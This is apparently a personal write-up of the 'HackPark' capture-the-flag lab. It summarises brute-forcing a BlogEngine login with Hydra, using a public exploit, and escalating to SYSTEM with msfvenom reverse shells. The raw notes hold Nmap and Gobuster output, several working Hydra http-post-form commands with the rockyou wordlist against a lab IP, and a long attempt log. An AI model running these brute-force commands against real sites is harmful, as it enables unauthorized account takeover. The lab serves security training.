🤡HACK PARK
Brute-force a website's login with Hydra, identify and use a public exploit, then escalate your privileges on this Windows machine
Here is how I did it:
1. Deploy the vulnerable machine:
I started by deploying the virtual machine. Nothing exciting, just making sure my test environment was ready.
2. Use Hydra to brute-force a login:
First, I scanned the machine with Nmap to find the running services.
Then I used Gobuster to look for possible paths or files on the web server.
I intercepted the HTTP requests with Burp Proxy to understand how the login form works.
I found that the form used a POST request, which is key.
I tried brute-forcing with Hydra using several default usernames and, after some research that showed the user was admin, I only brute-forced the password with Hydra using the rockyou.txt wordlist, and bingo, we found the password.
3. Compromise the machine:
I found that the website was running BlogEngine. I searched for exploits with searchsploit and on Exploit-DB.
I found an exploit and used it to get initial access. Bingo, I was in.
Then I used Meterpreter to explore the machine; I found the operating system version and an abnormal service.
4. Windows privilege escalation:
I generated a reverse shell with msfvenom to get more control, aiming for a Meterpreter session with Metasploit's multi/handler listening.
I downloaded and ran the payload on the target machine using the first shell we got.
With Meterpreter, I got information about the system and found an abnormal service running every 30 seconds. Running the binary got complicated because it would not run on its own, but I was able to escalate to SYSTEM privileges using Meterpreter's special command for automated privilege escalation, which told me it used method 5, and that was it, we had SYSTEM privileges. But then I did the same thing again: I ran my msfvenom-created binary and this time ran the service's file, receiving the shell in netcat as SYSTEM.
I replaced the abnormal service's binary with my own reverse shell payload.
I connected a handler, ran the exploit and that was it: I had a Meterpreter session with privileges.
5. Privilege escalation without Metasploit:
I switched from an unstable netcat session to a more stable reverse shell using msfvenom.
I used WinPEAS to look for vulnerabilities and it could not find the system installation information that was being asked for, so I found it with a command and that was that (later I saw in forums that many people had this problem).
Conclusion:
It was quite a journey, exploring different hacking techniques from brute force to exploiting vulnerabilities. This summary does not give you the exact answers, but it gives you an idea of how I approached each step. Good luck with your own hacking adventures!
OFFENSIVE PENTESTING:
HackPark:
WEB PAGE ANALYSIS:
http://10.10.174.239/Account/login.aspx?ReturnURL=%2fADMIN
<!--- BlogEngine 3.3.6.0 -->
<form method="post" action="login.aspx?ReturnURL=%2fADMIN" id="Form1">
<div class="aspNetHidden">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="dafpnMH9+6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2/X3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP">
</div>
<div class="aspNetHidden">
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="Tjy94c85ufC73iZyte/PDZ1wB3D/bqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN+woqOKdG3MY4wFOYEKmxK0llq5tR+foH/aDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t">
</div>
<div class="account">
<div class="account-header text-center">
<a href="https://blogengine.io/" target="_blank">
<img alt="BlogEngine.NET" src="../Content/images/blog/logo.png"></a>
</div>
<div id="StatusBox">
<div id="AdminStatus" style="display: none"></div>
</div>
<div class="account-box">
<h1 class="account-title">
<span id="lblTitle">Iniciar sesión</span>
</h1>
<div class="account-body">
<div class="form-group">
<label>Username</label>
<input name="ctl00$MainContent$LoginUser$UserName" type="text" id="UserName" class="textEntry ltr-dir">
</div>
<div class="form-group">
<label>Password</label>
<input name="ctl00$MainContent$LoginUser$Password" type="password" id="Password" class="passwordEntry ltr-dir">
</div>
<div class="form-group with-icon">
<span class="icon-form-group">
<input id="RememberMe" type="checkbox" name="ctl00$MainContent$LoginUser$RememberMe"></span>
<label for="RememberMe" id="RememberMeLabel" class="label-title ">Mantenerme autenticado</label>
</div>
<input type="submit" name="ctl00$MainContent$LoginUser$LoginButton" value="Iniciar sesión" onclick="return ValidateLogin();" id="LoginButton" class="btn btn-success btn-block btn-lg">
<div class="small-link ">
<a id="linkForgotPassword" class="text-muted" href="/Account/password-retrieval.aspx">¿Olvidó su contraseña?</a>
</div>
</div>
<script type="text/javascript">
$(document).ready(function () {
$("input[name$='UserName']").focus();
});
</script>
</div>
</div>
</form>
WE SEE THE SOFTWARE THAT THE LOGIN USES:
<img alt="BlogEngine.NET" src="../Content/images/blog/logo.png">
NMAP SCAN:
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O -Pn --script "vuln" 10.10.174.239
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-25 00:33 UTC
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:02:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 94.81% done; ETC: 00:36 (0:00:04 remaining)
Nmap scan report for ip-10-10-174-239.eu-west-1.compute.internal (10.10.174.239)
Host is up (0.00051s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ip-10-10-174-239.eu-west-1.compute.internal
| Found the following possible CSRF vulnerabilities:
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/
| Form id: aspnetform
| Form action: /
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/author/Admin
| Form id: aspnetform
| Form action: /author/Admin
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/archive
| Form id: aspnetform
| Form action: /archive
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/post/welcome-to-hack-park
| Form id: aspnetform
| Form action: /post/welcome-to-hack-park
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/category/BlogEngineNET
| Form id: aspnetform
|_ Form action: /category/BlogEngineNET
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /calendar/cal_search.php: ExtCalendar
| /robots.txt: Robots file
| /calendar/cal_cat.php: Calendarix
| /archive/: Potentially interesting folder
| /archives/: Potentially interesting folder
| /author/: Potentially interesting folder
| /contact/: Potentially interesting folder
| /contacts/: Potentially interesting folder
| /search/: Potentially interesting folder
|_ /search-ui/: Potentially interesting folder
|_http-server-header: Microsoft-IIS/8.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:microsoft:internet_information_services:8.5:
|_ CVE-2014-4078 5.1 https://vulners.com/cve/CVE-2014-4078
3389/tcp open ssl/ms-wbt-server?
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
MAC Address: 02:DA:32:DD:AC:71 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 214.52 seconds
LOOK FOR POSSIBLE DIRECTORY PATHS:
gobuster dir -u http://10.10.174.239/ -w /usr/share/wordlists/dirb/common.txt
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.174.239/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.174.239/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2024/01/25 00:51:10 Starting gobuster in directory enumeration mode
===============================================================
/account (Status: 301) [Size: 152] [--> http://10.10.174.239/account/]
/admin (Status: 302) [Size: 173] [--> http://10.10.174.239/Account/login.aspx?ReturnURL=/admin]
/Admin (Status: 302) [Size: 173] [--> http://10.10.174.239/Account/login.aspx?ReturnURL=/Admin]
/ADMIN (Status: 302) [Size: 173] [--> http://10.10.174.239/Account/login.aspx?ReturnURL=/ADMIN]
/Archive (Status: 200) [Size: 8325]
/archives (Status: 200) [Size: 8326]
/archive (Status: 200) [Size: 8325]
/aspnet_client (Status: 301) [Size: 158] [--> http://10.10.174.239/aspnet_client/]
/aux (Status: 500) [Size: 1763]
/Blog (Status: 500) [Size: 1208]
/blog (Status: 500) [Size: 1208]
/com1 (Status: 500) [Size: 1763]
/com2 (Status: 500) [Size: 1763]
/com3 (Status: 500) [Size: 1763]
/contact (Status: 200) [Size: 9935]
/Contact (Status: 200) [Size: 9935]
/contact_bean (Status: 200) [Size: 9940]
/contact_us (Status: 200) [Size: 9938]
/contact-form (Status: 200) [Size: 9940]
/contactinfo (Status: 200) [Size: 9939]
/contacts (Status: 200) [Size: 9936]
/contacto (Status: 200) [Size: 9936]
/contactus (Status: 200) [Size: 9937]
/ContactUs (Status: 200) [Size: 9937]
/contact-us (Status: 200) [Size: 9938]
/content (Status: 301) [Size: 152] [--> http://10.10.174.239/content/]
/Content (Status: 301) [Size: 152] [--> http://10.10.174.239/Content/]
/con (Status: 500) [Size: 1763]
/custom (Status: 301) [Size: 151] [--> http://10.10.174.239/custom/]
/Default (Status: 500) [Size: 1763]
/default_icon (Status: 500) [Size: 1763]
/default_image (Status: 500) [Size: 1763]
/defaults (Status: 500) [Size: 1763]
/default_pages (Status: 500) [Size: 1763]
/default_page (Status: 500) [Size: 1763]
/default_logo (Status: 500) [Size: 1763]
/default (Status: 500) [Size: 1763]
/fonts (Status: 301) [Size: 150] [--> http://10.10.174.239/fonts/]
/lpt2 (Status: 500) [Size: 1763]
/lpt1 (Status: 500) [Size: 1763]
/nul (Status: 500) [Size: 1763]
/prn (Status: 500) [Size: 1763]
/robots.txt (Status: 200) [Size: 303]
/Scripts (Status: 301) [Size: 152] [--> http://10.10.174.239/Scripts/]
/scripts (Status: 301) [Size: 152] [--> http://10.10.174.239/scripts/]
/search (Status: 200) [Size: 8407]
/Search (Status: 200) [Size: 8407]
/search_result (Status: 200) [Size: 8414]
/search_results (Status: 200) [Size: 8415]
/searchnx (Status: 200) [Size: 8409]
/search-results (Status: 200) [Size: 8415]
/searchurl (Status: 200) [Size: 8410]
/searchresults (Status: 200) [Size: 8414]
/setup (Status: 302) [Size: 175] [--> http://10.10.174.239/Account/login.aspx?ReturnUrl=%2fsetup]
Progress: 3851 / 4615 (83.45%)
===============================================================
2024/01/25 00:51:13 Finished
===============================================================
WE TRY BRUTE-FORCING THE LOGIN FORM WITH BURP SUITE:
WE TRY BRUTE-FORCING THE LOGIN FORM WITH HYDRA:
http://10.10.174.239/Account/login.aspx?ReturnURL=%2fADMIN
hydra -l penywise -P /usr/share/wordlists/rokyou.txt 10.10.174.239 http-post-form -vV
hydra -l penywise -P /usr/share/wordlists/rokyou.txt http://10.10.174.239/Account/login.aspx?ReturnURL=/admin/ http-post-form -vV
hydra -l penywise -P /usr/share/wordlists/rokyou.txt 10.10.174.239 -V http-post-form '__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=penywise&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n' -vV
/login.aspx?ReturnURL=%2fADMIN:
hydra -l penywise -P /usr/share/wordlists/rokyou.txt 10.10.174.239 -V http-post-form '/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=penywise&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n' -vV
IT WORKED. WE TOOK THE REQUEST PATH FROM THE URL + THE POST BODY AS SEEN IN BURP SUITE:
Note: the form spec goes in single quotes. Inside double quotes the shell expands $MainContent$LoginUser$UserName (and the other $-prefixed names) to nothing, which is why the [DATA] line of the captured run further down shows ctl00=^USER^ instead of the real field names.
hydra -l penywise -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form '/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed'
IT ALSO WORKED:
hydra -l penywise -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form '/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00$MainContent$LoginUser$UserName=penywise&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed'
IT WORKED:
hydra -l penywise -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form '/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=^VIEWSTATE^&__EVENTVALIDATION=^EVENTVALIDATION^&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed'
┌──(root㉿kali)-[/usr/share/wordlists]
└─# hydra -l penywise -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=^VIEWSTATE^&__EVENTVALIDATION=^EVENTVALIDATION^&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-25 01:33:32
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.174.239:80/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=^VIEWSTATE^&__EVENTVALIDATION=^EVENTVALIDATION^&ctl00=^USER^&ctl00=^PASS^&ctl00=Iniciar+sesi%C3%B3n:Login failed
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "654321" - 17 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "michael" - 18 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "ashley" - 19 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "qwerty" - 20 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "111111" - 21 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "iloveu" - 22 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "000000" - 23 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "michelle" - 24 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "tigger" - 25 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sunshine" - 26 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "chocolate" - 27 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "password1" - 28 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "soccer" - 29 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "anthony" - 30 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "friends" - 31 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "butterfly" - 32 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "purple" - 33 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "angel" - 34 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jordan" - 35 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "liverpool" - 36 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "justin" - 37 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "loveme" - 38 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "fuckyou" - 39 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "123123" - 40 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "football" - 41 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "secret" - 42 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "andrea" - 43 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "carlos" - 44 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jennifer" - 45 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "joshua" - 46 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "bubbles" - 47 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "1234567890" - 48 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "superman" - 49 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "hannah" - 50 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "melissa" - 74 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "eminem" - 75 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "matthew" - 76 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "robert" - 77 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "danielle" - 78 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "forever" - 79 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "family" - 80 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jonathan" - 81 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "987654321" - 82 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "computer" - 83 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "whatever" - 84 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "dragon" - 85 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "vanessa" - 86 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "cookie" - 87 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "naruto" - 88 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "summer" - 89 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sweety" - 90 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "spongebob" - 91 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "joseph" - 92 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "junior" - 93 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "softball" - 94 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "taylor" - 95 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "yellow" - 96 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "daniela" - 97 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "lauren" - 98 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "mickey" - 99 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "princesa" - 100 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "alexandra" - 101 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "alexis" - 102 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jesus" - 103 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "estrella" - 104 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "miguel" - 105 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "william" - 106 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "thomas" - 107 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "beautiful" - 108 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "mylove" - 109 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "angela" - 110 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "poohbear" - 111 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "patrick" - 112 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "iloveme" - 113 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sakura" - 114 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "adrian" - 115 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "alexander" - 116 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "destiny" - 117 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "christian" - 118 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "121212" - 119 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sayang" - 120 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "america" - 121 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "dancer" - 122 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "monica" - 123 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "richard" - 124 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "112233" - 125 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "princess1" - 126 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "555555" - 127 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "diamond" - 128 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "carolina" - 129 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "steven" - 130 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "rangers" - 131 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "louise" - 132 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "orange" - 133 of 14344399 [child 3] (0/0)
